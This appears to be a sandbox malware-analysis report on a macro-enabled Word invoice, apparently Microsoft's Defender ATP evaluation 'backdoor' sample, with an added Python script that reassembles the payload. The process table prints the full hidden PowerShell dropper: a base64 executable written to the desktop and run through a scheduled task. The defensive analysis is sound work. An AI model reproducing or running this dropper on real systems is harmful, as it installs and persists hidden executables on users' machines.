Field | Value |
---|---|
File name: | RS4_WinATP-Intro-Invoice.docm |
Full analysis: | https://app.any.run/tasks/f5a94796-e353-42f8-baec-3409233611b6 |
Verdict: | Malicious activity |
Analysis date: | October 20, 2020, 13:13:31 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | application/encrypted |
File info: | CDFV2 Encrypted |
MD5: | 8D61637E5F745229F28E6FED9E54FF1A |
SHA1: | 55717093C9B5DD31E2C30855952367F7D29116B6 |
SHA256: | B94C4B6A7010288D98E3F3DEC79B9EC5285A444B046C8F29ABEABF17FBE29138 |
SSDEEP: | 3072:LGIkTJkWFjoyJvyUWlu5gqRU9AU6JiI2JAEJD6BofiQlMUWp5uL:qT6WyyDW05gqiGv8I2BJD6SfXWuL |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
2364 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\Desktop\RS4_WinATP-Intro-Invoice.docm" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Exit code: 0 Version: 14.0.6024.1000 | ||||
1336 | "C:\Windows\system32\notepad.exe" | C:\Windows\system32\notepad.exe | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Notepad Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
3144 | "C:\Windows\explorer.exe" | C:\Windows\explorer.exe | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Explorer Exit code: 1 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
3712 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\Desktop\RS4_WinATP-Intro-Invoice.docm" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Version: 14.0.6024.1000 | ||||
2476 | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -W Hidden -Exec Bypass -Command cd /;$fileBase64Prefix = '';$fileBase64Prefix= $fileBase64Prefix + 'TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABQRQAAZIYCACbMsFoAAAAAAAAAAPAAIgALAjAAABYAAAAGAAAAAAAAAAAAAAAgAAAAAABAAQAAAAAgAAAAAgAABAAAAAAAAAAGAAAAAAAAAABgAAAAAgAAAAAAAAMAYIUAAEAAAAAAAABAAAAAAAAAAAAQAAAAAAAAIAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAABAAADMBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAxDMAABwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA';$fileBase64Prefix= $fileBase64Prefix + 'AAAAgAABIAAAAAAAAAAAAAAAudGV4dAAAAPwUAAAAIAAAABYAAAACAAAAAAAAAAAAAAAAAAAgAABgLnJzcmMAAADMBAAAAEAAAAAGAAAAGAAAAAAAAAAAAAAAAAAAQAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABIAAAAAgAFABAjAAC0EAAAAQAAAAsAAAYAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAeAnsBAAAEKiICA30BAAAEKh4CewIAAAQqIgIDfQIAAAQqHgJ7AwAABCoiAgN9AwAABCoAEzAFADcAAAABAAARAnsGAAAEcgEAAHB+BAAABBIA/hUCAAACEgADKAIAAAYSAAQoBAAABhIABSgGAAAGBm8BAAArKnYCchkAAHAefgUAAARzCwAACn0GAAAEAigMAAAKKgAAABMwBABOAAAAAgAAER';$fileBase64Prefix= $fileBase64Prefix + 'IA/hUNAAABEgAbKA0AAAoSACEAAAAAACAAACgOAAAKEgAgAAAgACgPAAAKBoAEAAAEGI0WAAABJRZyZwAAcKIlF3J7AABwooAFAAAEKgAAEzAFAE8AAAADAAARfgoAAAQXaliACgAABAQsF3LJAABwBG8QAAAKcuEAAHAoEQAACisFcuUAAHAKfgkAAAR/CgAABHLnAABwKBIAAAoCAwYoEwAACm8HAAAGKgAbMAMALwEAAAQAABEXcu0AAHAUKAoAAAYWCigUAAAKcgsBAHAoFQAACigWAAAKbxcAAApzGAAACn4IAAAEKBkAAAoK3gMm3gB+GgAACnKeAQBwbxsAAAoLBy0QfhoAAApyngEAcG8cAAAKCwdyAgIAcG8dAAAKLC9zHgAACiUXbx8AAAolcgwCAHBvIAAACiVyHAIAcG8hAAAKKCIAAAomHzIoIwAACgdyAgIAcG8dAAAKLAcfZCgjAAAKcx4AAAolF28fAAAKJXIMA';$fileBase64Prefix= $fileBase64Prefix + 
'gBwbyAAAAolcr0CAHBvIQAACigiAAAKJgYsOHLkAwBwcv4DAHAoJAAACiZzHgAACiUXbx8AAAolcgwCAHBvIAAACiVyHAIAcG8hAAAKKCIAAAomF3ImBABwFCgKAAAGckgEAHAoJQAACigmAAAKJioAARAAAAAADgArOQADDAAAAR4CKAwAAAoqhnKyBABwcxgAAAqACAAABHMIAAAGgAkAAAQWaoAKAAAEKgAAQlNKQgEAAQAAAAAADAAAAHY0LjAuMzAzMTkAAAAABQBsAAAAZAQAACN+AADQBAAAKAUAACNTdHJpbmdzAAAAAPgJAADMBAAAI1VTAMQOAAAQAAAAI0dVSUQAAADUDgAA4AEAACNCbG9iAAAAAAAAAAIAAAFXHaIBCQgAAAD6ATMAFgAAAQAAACAAAAAEAAAACgAAAA0AAAAKAAAAJgAAAAIAAAARAAAABAAAAAEAAAADAAAABgAAAAEAAAACAAAAAQAAAAAAFAIB';$fileBase64Prefix= $fileBase64Prefix + 'AAAAAAAGAMcBFgQGAOcBFgQGAGkByQMPADYEAAAGAH0B9wMGAFsB9wMGAKoBFQMGAJEBSQIGAC0BHQIGAAwB3wIGAEABFgQGALEE3wIGAHEEHQIGAK4AHQIGAA0D3wIGADcD3wIGAP0EAQAGAFgEHQIGAJECHQIGAOkDHQIGAE4EHQIGAHIC3wIGABEA3wIGALgE3wIGAH0CQwAKAF0DyQMGAB0FAQAKAHwDyQMKAIQEyQMGAFYAOAIGAOUA3wIGAI0D3wIAAAAAOgAAAAAAAQABAAkBEADTACMAKQABAAEAAQAQAKgAIwAxAAQABwAAABAA1wIjADEABwAKAAEAXQDMAAEAdADPAAEAkgDMABYAJwPSADEAjATWAAEAQgTaAFaAYwLMABEAGADeABEApwPiABEA5gLmAEggAAAAAIYIugBSAAEAUCAAAAAAhgjEABUAAQBZIAAAAACGCJwC6QACAGEgAAAAAIYIrQIQAAIAaiAAAAA';$fileBase64Prefix= $fileBase64Prefix + 'AhghLA1IAAwByIAAAAACGCFQDFQADAHwgAAAAAIYAzgDtAAQAvyAAAAAAhhi8AwYABwDgIAAAAACRGMID9AAHADwhAAAAAJEAFgH4AAcAmCEAAAAAlgD9AgABCgDkIgAAAACGGLwDBgALAOwiAAAAAJEYwgP0AAsAAAABAA4CAAABAA4CAAABAA4CAAABAN8AAAACAMsCAAADAJwDAAABAL4CAAACAHkCEBADAEEDAAABAGwECQC8AwEAEQC8AwYAGQC8AwoAKQC8AxAAMQC8AxUAOQC8AxUAQQC8AxUASQC8AwYAWQC8AwYAcQAnAR8AcQC8Ay4AYQC8AwYAaQCHAjwAaQDcA0IAaQBFBEgAYQBwAlIAsQCqBFYAuQBwAl0AsQCqBGIAwQAJBW4AyQAEAWIA0QBtA3IA0QACA1IAeQC8AxUAeQDxAngA2QCwA4AAiQDqBIQAiQDdBIQAiQAFAooA4QC8AwYA4QDKBBAA4QDtABUA4Q';$fileBase64Prefix= $fileBase64Prefix + 
'CcBBUA6QDEBI8A8QChA5YA6QDEBJsA+QD6AKIA+QD1BKcADgAcALYAEgAlAMcAIABLAMYBIQBLAMYBLgALAA4BLgATABcBLgAbADYBLgAjAD8BLgArAEUBLgAzAG8BLgA7AHwBQABLAMYBQQBLAMYBQwBDAMsBYABLAMYBYQBLAMYBgABLAMYBoABLAMYBwABLAMYBGgA3AE4AaAACAAEAAADZAAYBAACxAgoBAACXAwYBAgABAAMAAQACAAMAAgADAAUAAQAEAAUAAgAFAAcAAQAGAAcABIAAAAEAAAAAAAAAAAAAAAAAggIAAAQAAAAAAAAAAAAAAK0ATQAAAAAABAAAAAAAAAAAAAAArQDfAgAAAAAVACkAAAAATWljcm9zb2Z0LldpbjMyAFVJbnQ2NABzX3NlbnNlUlM0AFdpbkFUUEludHJvQmFja2Rvb3JSUzQAPE1vZHVsZT4AU3lzdGVtLklPAG1zY29ybGliAFRocmVhZ';$fileBase64Prefix= $fileBase64Prefix + 'AA8U3RhZ2U+a19fQmFja2luZ0ZpZWxkADxJc1N1Y2Nlc3NmdWw+a19fQmFja2luZ0ZpZWxkADxJbmZvPmtfX0JhY2tpbmdGaWVsZABUcmFjZQBFdmVudFNvdXJjZQBnZXRfU3RhZ2UAc2V0X1N0YWdlAFRyYWNlQXR0YWNrU3RhZ2UAc3RhZ2UAQ29uc29sZQBzZXRfRmlsZU5hbWUAV3JpdGVMaW5lAENvbWJpbmUAVmFsdWVUeXBlAFRyYWNlQXR0YWNrUGhhc2UAV3JpdGUARXZlbnREYXRhQXR0cmlidXRlAENvbXBpbGVyR2VuZXJhdGVkQXR0cmlidXRlAEd1aWRBdHRyaWJ1dGUARGVidWdnYWJsZUF0dHJpYnV0ZQBDb21WaXNpYmxlQXR0cmlidXRlAFRhcmdldEZyYW1ld29ya0F0dHJpYnV0ZQBBc3NlbWJseUZpbGVWZXJzaW9uQXR0cmlidXRlAENvbXBpbGF0aW9u';$fileBase64Prefix= $fileBase64Prefix + 'UmVsYXhhdGlvbnNBdHRyaWJ1dGUAUnVudGltZUNvbXBhdGliaWxpdHlBdHRyaWJ1dGUAR2V0VmFsdWUAdmFsdWUAVHJvai5leGUAU3lzdGVtLkRpYWdub3N0aWNzLlRyYWNpbmcAU3lzdGVtLlRocmVhZGluZwBTeXN0ZW0uUnVudGltZS5WZXJzaW9uaW5nAGNfbG9maVN0cmluZwBUb1N0cmluZwBtc2cAUGF0aABUcm9qAHNldF9MZXZlbABFdmVudExldmVsAGdldF9Jc1N1Y2Nlc3NmdWwAc2V0X0lzU3VjY2Vzc2Z1bABpc1N1Y2Nlc3NmdWwAaXN1Y2Nlc3NmdWwAUHJvZ3JhbQBTeXN0ZW0Ac190cmFjZU51bQBvcF9MZXNzVGhhbgBNYWluAGdldF9Qcm9kdWN0VmVyc2lvbgBTeXN0ZW0uUmVmbGVjdGlvbgBUZWxlbWV0cnlPcHRpb24ARXhjZXB0aW9uAGV4Y2VwdGl';$fileBase64Prefix= $fileBase64Prefix + 
'vbgBnZXRfSW5mbwBzZXRfSW5mbwBGaWxlVmVyc2lvbkluZm8AR2V0VmVyc2lvbkluZm8AUHJvY2Vzc1N0YXJ0SW5mbwBDb25zb2xlS2V5SW5mbwBpbmZvAFNsZWVwAHNfbG9nZ2VyAEN1cnJlbnRVc2VyAC5jdG9yAC5jY3RvcgBTeXN0ZW0uRGlhZ25vc3RpY3MAc2V0X0tleXdvcmRzAEV2ZW50S2V5d29yZHMAU3lzdGVtLlJ1bnRpbWUuSW50ZXJvcFNlcnZpY2VzAFN5c3RlbS5SdW50aW1lLkNvbXBpbGVyU2VydmljZXMARGVidWdnaW5nTW9kZXMAc2V0X1RhZ3MARXZlbnRUYWdzAEV2ZW50U291cmNlU2V0dGluZ3MAYXJncwBFdmVudFNvdXJjZU9wdGlvbnMAUHJvY2VzcwB0ZWxlbWV0cnlUcmFpdHMAc2V0X0FyZ3VtZW50cwBDb25jYXQAT2JqZWN0AEVudmlyb2';$fileBase64Prefix= $fileBase64Prefix + '5tZW50AFN0YXJ0AHNldF9DcmVhdGVOb1dpbmRvdwBDcmVhdGVTdWJLZXkAT3BlblN1YktleQBSZWFkS2V5AFJlZ2lzdHJ5S2V5AGdldF9TeXN0ZW1EaXJlY3RvcnkAUmVnaXN0cnkAAAAAF0EAdAB0AGEAYwBrAFMAdABhAGcAZQAATU0AaQBjAHIAbwBzAG8AZgB0AC4AVwBpAG4AZABvAHcAcwAuAFMAZQBuAHMAZQAuAEEAdAB0AGEAYwBrAFMAYwBlAG4AYQByAGkAbwAAE0UAVABXAF8ARwBSAE8AVQBQAABNewA1AEUAQwBCADAAQgBBAEMALQBCADkAMwAwAC0ANAA3AEYANQAtAEEAOABBADQALQBFADgAMgA1ADMANQAyADkARQBEAEIANwB9AAEXRQB4AGMAZQBwAHQAaQBvAG4AOgAgAAADLgAAAQAFRAAyAAAdQQB0AHQAYQBjAGsAIABzAHQAYQByAHQAZQBkAACAk';$fileBase64Prefix= $fileBase64Prefix + 'UMAOgBcAFAAcgBvAGcAcgBhAG0AIABGAGkAbABlAHMAXABXAGkAbgBkAG8AdwBzACAARABlAGYAZQBuAGQAZQByACAAQQBkAHYAYQBuAGMAZQBkACAAVABoAHIAZQBhAHQAIABQAHIAbwB0AGUAYwB0AGkAbwBuAFwATQBzAFMAZQBuAHMAZQAuAGUAeABlAABjUwBvAGYAdAB3AGEAcgBlAFwATQBpAGMAcgBvAHMAbwBmAHQAXABXAGkAbgBkAG8AdwBzAFwAQwB1AHIAcgBlAG4AdABWAGUAcgBzAGkAbwBuAFwAUgB1AG4ATwBuAGMAZQAACVQAcgBvAGoAAA9jAG0AZAAuAGUAeABlAACAny8AYwAgAFIARQBHACAARABFAEwARQBUAEUAIABIAEsAQwBVAFwAUwBPAEYAVABXAEEAUgBFAFwATQBpAGMAcgBvAHMAbwBmAHQAXABXAGkAbgBkAG8AdwBzAFwAQwB1AHIAcgBl';$fileBase64Prefix= $fileBase64Prefix + 
'AG4AdABWAGUAcgBzAGkAbwBuAFwAUgB1AG4ATwBuAGMAZQAgAC8AZgAgAC8AdgAgAFQAcgBvAGoAAIElLwBjACAAUgBFAEcAIABBAEQARAAgAEgASwBDAFUAXABTAE8ARgBUAFcAQQBSAEUAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAXABDAHUAcgByAGUAbgB0AFYAZQByAHMAaQBvAG4AXABSAHUAbgBPAG4AYwBlACAALwBmACAALwB2ACAAVAByAG8AagAgAC8AdAAgAFIARQBHAF8ARQBYAFAAQQBOAEQAXwBTAFoAIAAvAGQAIABeACUAdQBzAGUAcgBwAHIAbwBmAGkAbABlAF4AJQBcAGQAZQBzAGsAdABvAHAAXABXAGkAbgBBAFQAUAAtAEkAbgB0AHIAbwAtAEIAYQBjAGsAZABvAG8AcgAuAGUAeABlAAEZcwBjAGgAdABhAHMAawBzAC4AZQB';$fileBase64Prefix= $fileBase64Prefix + '4AGUAACcvAGQAZQBsAGUAdABlACAALwBUAE4AIABUAHIAbwBqACAALwBGAAAhQQB0AHQAYQBjAGsAIABmAGkAbgBpAHMAaABlAGQALgAAaUEAdAB0AGEAYwBrACAAcwBjAGUAbgBhAHIAaQBvACAAYwBvAG0AcABsAGUAdABlAGQAIAAKAFAAcgBlAHMAcwAgAGEAbgB5ACAAawBlAHkAIAB0AG8AIABjAGwAbwBzAGUALgAuAC4AABcxADAALgA0ADgAMwAwAC4AMAAuADAAAAAAMDGeN5T9TEeNZl5pUmLqYAAEIAEBCAMgAAEFIAEBEREEIAEBAgQgAQEOBAcBEQgJMAEDAQ4RNR4ABAoBEQgIIAMBDhFJHQ4EBwERNQUgAQERTQUgAQERUQUgAQERVQMHAQ4DIAAOBgADDg4ODgQgAQ4OBQACDg4OBQcCAhJFAwAADgUAARJpDgcAAgISPRI9AwYSRQUgARJFDgQgARwOBgABEn';$fileBase64Prefix= $fileBase64Prefix + 'UScQQAAQEIBgACEnUODgQAAQEOBQAAEYCBCLd6XFYZNOCJEFQAcgBvAGoALgBlAHgAZQAEAAAAAAIGDgIGAgMGETUDBh0OAwYSOQMGEj0DBhIMAgYLAyAAAgYgAwEOAg4DAAABBwADAQIOEkEFAAEBHQ4DKAAOAygAAggBAAgAAAAAAB4BAAEAVAIWV3JhcE5vbkV4Y2VwdGlvblRocm93cwEIAQACAAAAAAAFAQAAAAApAQAkNjg4ZjViMWUtY2FhNi00YWJlLWFkZGUtYTQ1YzQ0YWE3YmYwAAAMAQAHMS4wLjAuMAAASQEAGi5ORVRGcmFtZXdvcmssVmVyc2lvbj12NC42AQBUDhRGcmFtZXdvcmtEaXNwbGF5TmFtZRIuTkVUIEZyYW1ld29yayA0LjYEAQAAABEBAAEAVA4ETmFtZQVTdGFnZQAAAAAAAAAmzLBaAAAAAAIAAAAcAQAA4DMAAOAVAABSU0RTb3U0m6zI0UeqE';$fileBase64Prefix= $fileBase64Prefix + 
'Cosvclp8QEAAABDOlxkZXZcUmVwb3NcRElZXFdpbkFUUEludHJvQmFja2Rvb3JSUzRcb2JqXFJlbGVhc2VcVHJvai5wZGIAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA';$fileBase64Prefix= $fileBase64Prefix + 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACABAAAAAgAACAGAAAAFAAAIAAAAAAAAAAAAAAAAAAAAEAAQAAADgAAIAAAAAAAAAAAAAAAAAAAAEAAAAAAIAAAAAAAAAAAAAAAAAAAAAAAAEAAQAAAGgAAIAAAAAAAAAAAAAAAAAAAAEAAAAAAMwCAACQQAAAPAIAAAAAAAAAAAAAPAI0AAAAVgBTAF8AVgBFAFIAUwBJAE8ATgBfAEkATgBGAE8AAAAAAL0E7/4AAAEAAAABAAAAAAAAAAEAAAAAAD8AAAAAAAAABAA';$fileBase64Prefix= $fileBase64Prefix + 'AAAEAAAAAAAAAAAAAAAAAAABEAAAAAQBWAGEAcgBGAGkAbABlAEkAbgBmAG8AAAAAACQABAAAAFQAcgBhAG4AcwBsAGEAdABpAG8AbgAAAAAAAACwBJwBAAABAFMAdAByAGkAbgBnAEYAaQBsAGUASQBuAGYAbwAAAHgBAAABADAAMAAwADAAMAA0AGIAMAAAACwAAgABAEYAaQBsAGUARABlAHMAYwByAGkAcAB0AGkAbwBuAAAAAAAgAAAAMAAIAAEARgBpAGwAZQBWAGUAcgBzAGkAbwBuAAAAAAAxAC4AMAAuADAALgAwAAAAMgAJAAEASQBuAHQAZQByAG4AYQBsAE4AYQBtAGUAAABUAHIAbwBqAC4AZQB4AGUAAAAAACgAAgABAEwAZQBnAGEAbABDAG8AcAB5AHIAaQBnAGgAdAAAACAAAAA6AAkAAQBPAHIAaQBnAGkAbgBhAGwARgBpAGwAZQBuAGEAbQBlAAAAVAByAG';$fileBase64Prefix= $fileBase64Prefix + 
'8AagAuAGUAeABlAAAAAAA0AAgAAQBQAHIAbwBkAHUAYwB0AFYAZQByAHMAaQBvAG4AAAAxAC4AMAAuADAALgAwAAAAOAAIAAEAQQBzAHMAZQBtAGIAbAB5ACAAVgBlAHIAcwBpAG8AbgAAADEALgAwAC4AMAAuADAAAADcQgAA6gEAAAAAAAAAAAAA77u/PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0iVVRGLTgiIHN0YW5kYWxvbmU9InllcyI/Pg0KDQo8YXNzZW1ibHkgeG1sbnM9InVybjpzY2hlbWFzLW1pY3Jvc29mdC1jb206YXNtLnYxIiBtYW5pZmVzdFZlcnNpb249IjEuMCI+DQogIDxhc3NlbWJseUlkZW50aXR5IHZlcnNpb249IjEuMC4wLjAiIG5hbWU9Ik15QXBwbGljYXRpb24uYXBwIi8+DQogIDx0cnVzdEluZm8geG1sbnM9InVybjpzY2hlbWFzL';$fileBase64Prefix= $fileBase64Prefix + 'W1pY3Jvc29mdC1jb206YXNtLnYyIj4NCiAgICA8c2VjdXJpdHk+DQogICAgICA8cmVxdWVzdGVkUHJpdmlsZWdlcyB4bWxucz0idXJuOnNjaGVtYXMtbWljcm9zb2Z0LWNvbTphc20udjMiPg0KICAgICAgICA8cmVxdWVzdGVkRXhlY3V0aW9uTGV2ZWwgbGV2ZWw9ImFzSW52b2tlciIgdWlBY2Nlc3M9ImZhbHNlIi8+DQogICAgICA8L3JlcXVlc3RlZFByaXZpbGVnZXM+DQogICAgPC9zZWN1cml0eT4NCiAgPC90cnVzdEluZm8+DQo8L2Fzc2VtYmx5PgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA';$fileBase64Suffix= 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA';if (Test-Path env:computername) { $fileBase64Hash= [System.Convert]::ToBase64String([System.Text.Encoding]::UTF8.GetBytes($env:computername)).Replace('=','A')} else { $fileBase64Hash = 'AAAA' };$fileBase64= $fileBase64Prefix + $fileBase64Hash + $fileBase64Suffix;$file= [Convert]::FromBase64String([string]$fileBase64);$filename= 'WinATP-Intro-Backdoor.exe';$desktop=[Environment]::GetFolderPath('Desktop');$fullpath = Join-path $desktop $filename;[io.file]::WriteAllBytes($fullpath,$file);copy $fullpath $desktop;schtasks /create /SC ONCE /TN Troj /TR $fullpath /ST (Get-Date).AddMinutes(-2).ToString('HH:mm') /F;$settings = New-ScheduledTaskSettingsSet 
-AllowStartIfOnBatteries -DontStopIfGoingOnBatteries;Set-ScheduledTask -TaskName 'Troj' -Settings $settings;schtasks /run /TN Troj | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | | WINWORD.EXE |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
2336 | "C:\Windows\system32\schtasks.exe" /create /SC ONCE /TN Troj /TR C:\Users\admin\Desktop\WinATP-Intro-Backdoor.exe /ST 14:13 /F | C:\Windows\system32\schtasks.exe | — | powershell.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Manages scheduled tasks Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
3312 | "C:\Windows\system32\schtasks.exe" /run /TN Troj | C:\Windows\system32\schtasks.exe | — | powershell.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Manages scheduled tasks Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) |
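The process table is the useful part of this report. The `.docm` is identified as `CDFV2 Encrypted`, i.e. an OOXML package wrapped in an encrypted (password-protected or IRM) Compound File container, so the MD5/SHA values above describe that container and the VBA cannot be read statically without the password; the macro's PowerShell child (PID 2476) is where the payload becomes visible. That command line builds one base64 string from a chain of `$fileBase64Prefix` chunks, inserts `Base64(COMPUTERNAME)` with every `=` rewritten to `A` (or the literal `AAAA` when the variable is absent), appends `$fileBase64Suffix`, decodes the result to `WinATP-Intro-Backdoor.exe` on the desktop and schedules it. Two consequences for an analyst: the dropped file carries the host name inside its zero-padded tail, so its hash differs on every machine and the sandbox's hash of that file is not a shareable indicator, and the whole executable is recoverable from the captured command line alone. The decoded blob is a .NET assembly whose strings include the PDB path `C:\dev\Repos\DIY\WinATPIntroBackdoorRS4\obj\Release\Troj.pdb`, the event source name `Microsoft.Windows.Sense.AttackScenario`, the path `C:\Program Files\Windows Defender Advanced Threat Protection\MsSense.exe`, `REG ADD`/`REG DELETE` commands for a `Troj` value under `HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce`, and `schtasks.exe /delete /TN Troj /F`, i.e. the self-cleanup of Microsoft's Defender ATP "Do It Yourself" evaluation backdoor.

The script below is an added analyst helper, not part of the sandbox report or of the sample. It parses a command line of that shape, rebuilds the blob for a given computer name and reports whether the result is a PE, where the host name lands in it and whether the host slot is 4-character aligned. `SAMPLE_CMDLINE` is a constructed stand-in with the same statement structure but a 12-byte `MZ` stub in place of the real blob; feeding the functions the real command line text recovers the actual executable.

```python
"""Reassemble and decode a staged-base64 PowerShell dropper of the shape seen in
the process table: $fileBase64Prefix chunks + host-derived slot + $fileBase64Suffix.
Added analyst tooling; not part of the sandbox report."""
import base64
import hashlib
import re

# Constructed stand-in for the report's command line: same statement shapes,
# but the real PE blob is replaced by a 12-byte "MZ" stub plus zeros so the
# example runs offline. The parser depends only on the structure.
SAMPLE_CMDLINE = (
    "powershell.exe -W Hidden -Exec Bypass -Command cd /;"
    "$fileBase64Prefix = '';"
    "$fileBase64Prefix= $fileBase64Prefix + 'TVqQAAAA';"
    "$fileBase64Prefix= $fileBase64Prefix + \n'AAAAAAAA';"  # chunk split over a line break, as in the report
    "$fileBase64Suffix= 'AAAAAAAA';"
    "if (Test-Path env:computername) { $fileBase64Hash= [System.Convert]::ToBase64String("
    "[System.Text.Encoding]::UTF8.GetBytes($env:computername)).Replace('=','A')} "
    "else { $fileBase64Hash = 'AAAA' };"
    "$fileBase64= $fileBase64Prefix + $fileBase64Hash + $fileBase64Suffix;"
    "$file= [Convert]::FromBase64String([string]$fileBase64);"
    "$filename= 'WinATP-Intro-Backdoor.exe';"
)

B64 = r"[A-Za-z0-9+/=]*"
PREFIX_CHUNK = re.compile(r"\$fileBase64Prefix\s*=\s*\$fileBase64Prefix\s*\+\s*'(" + B64 + r")'")
SUFFIX = re.compile(r"\$fileBase64Suffix\s*=\s*'(" + B64 + r")'")


def reassemble(cmdline):
    """Return (prefix, suffix): the prefix chunks joined in statement order and
    the suffix literal, exactly as PowerShell would build them."""
    prefix = "".join(PREFIX_CHUNK.findall(cmdline))
    m = SUFFIX.search(cmdline)
    if not prefix or not m:
        raise ValueError("command line does not contain the expected prefix/suffix statements")
    return prefix, m.group(1)


def host_slot(computername):
    """Mirror the dropper's slot: Base64(UTF-8 name) with '=' rewritten to 'A'.
    The slot is always a multiple of 4 chars, so the blob decodes for any name;
    the rewritten padding decodes to the name followed by up to two NUL bytes."""
    if not computername:
        return "AAAA"
    return base64.b64encode(computername.encode("utf-8")).decode().replace("=", "A")


def rebuild_payload(cmdline, computername):
    """Bytes the dropper would write to disk on a host with this computer name."""
    prefix, suffix = reassemble(cmdline)
    return base64.b64decode(prefix + host_slot(computername) + suffix)


def analyze(cmdline, computername):
    """Triage summary: PE check, size, hash, where the host name lands, and
    whether the slot starts on a 4-char boundary (if not, the inserted bytes
    are bit-shifted relative to the name but the blob still decodes)."""
    prefix, _ = reassemble(cmdline)
    payload = rebuild_payload(cmdline, computername)
    return {
        "is_pe": payload[:2] == b"MZ",
        "size": len(payload),
        "sha256": hashlib.sha256(payload).hexdigest(),
        "host_marker_offset": payload.find(computername.encode("utf-8")) if computername else -1,
        "slot_aligned": len(prefix) % 4 == 0,
    }


if __name__ == "__main__":
    for name in ("LAB-PC01", "WS-7"):
        print(name, analyze(SAMPLE_CMDLINE, name))
```

Running it with two different names yields two different sizes and hashes for what is functionally the same executable, which is the reason to pivot on behaviour (desktop-dropped EXE, `schtasks` from PowerShell) rather than on the dropped file's hash.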
PID | Process | Filename | Type | |
---|---|---|---|---|
2364 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVR3F50.tmp.cvr | — | |
MD5:— | SHA256:— | |||
2364 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\~DF51FBC9A8ADE44E4C.TMP | — | |
MD5:— | SHA256:— | |||
2364 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\~DF41E12293740D5BE7.TMP | — | |
MD5:— | SHA256:— | |||
2364 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\~DFB25F48D52142082D.TMP | — | |
MD5:— | SHA256:— | |||
2364 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{74C264D5-83B3-47DB-93B1-0E449E7A3602}.tmp | — | |
